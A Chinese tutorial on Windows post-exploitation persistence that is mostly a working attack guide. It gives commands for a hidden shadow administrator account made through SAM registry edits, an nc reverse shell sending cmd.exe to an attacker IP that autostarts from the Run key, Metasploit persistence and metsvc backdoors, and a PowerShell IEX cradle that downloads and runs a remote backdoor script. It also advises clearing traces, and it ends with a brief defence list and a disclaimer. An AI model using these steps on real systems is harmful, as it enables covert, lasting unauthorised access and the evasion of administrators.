后渗透阶段的权限维持(Windows篇)
字数 952 2025-08-18 11:37:33
Windows后渗透权限维持技术详解
一、前言
在渗透测试过程中,获取目标主机权限后,为防止因管理员发现并修补漏洞导致权限丢失,权限维持技术至关重要。本文详细总结Windows系统中的多种权限维持方法。
二、影子账户技术
1. 创建隐藏账户
net user OMG$ /add
注:$符号创建的账户在net user命令下不可见
2. 注册表操作步骤
- 打开注册表编辑器,定位到:
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users - 找到Administrator项(通常为000001F4),复制其F键值
- 找到新创建账户(OMG$)对应的项,将F键值粘贴
- 导出Names下的OMG$和对应数值项注册表
- 删除账户:
net user OMG$ /del - 导入之前导出的注册表文件
三、NC自启动技术
1. 基本NC连接
- 攻击机监听:
nc -l -vv -p [端口] - 目标机连接:
nc -t -e cmd.exe [攻击机IP] [端口]
2. 注册表自启动
将NC连接命令添加到以下注册表路径实现开机自启:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
四、MSF权限维持技术
1. Persistence模块
run persistence -U -i [间隔秒数] -p [端口] -r [攻击机IP]
参数说明:
-U:用户登录后自启动(写入HKCU注册表)-i:反向连接间隔时间(秒)-p:反向连接端口-r:反向连接IP地址
2. Metsvc模块
run metsvc
特点:
- 在目标主机创建服务
- 默认监听31337端口
- 使用
windows/metsvc_bind_tcp模块重新连接
五、PowerShell权限维持
1. 基本命令
powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://[服务器]/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method nccat -ip [攻击机IP] -port [端口] -time [间隔]"
2. 参数说明
-exec bypass:绕过执行策略限制-method nccat:使用NC连接方式-time:连接间隔时间
六、技术对比与建议
| 方法 | 隐蔽性 | 可靠性 | 适用场景 |
|---|---|---|---|
| 影子账户 | 高 | 中 | 长期权限维持 |
| NC自启动 | 低 | 高 | 需要持续监听 |
| MSF Persistence | 中 | 高 | 专业渗透测试 |
| PowerShell | 中 | 高 | 灵活部署 |
实战建议:
- 优先使用MSF和PowerShell方法
- 结合多种技术提高可靠性
- 注意清理操作痕迹
七、防御措施
- 定期检查注册表启动项
- 监控异常网络连接
- 审核系统账户变化
- 限制PowerShell执行权限
- 部署EDR解决方案
注:本文所述技术仅用于安全研究和授权测试,未经授权使用属违法行为。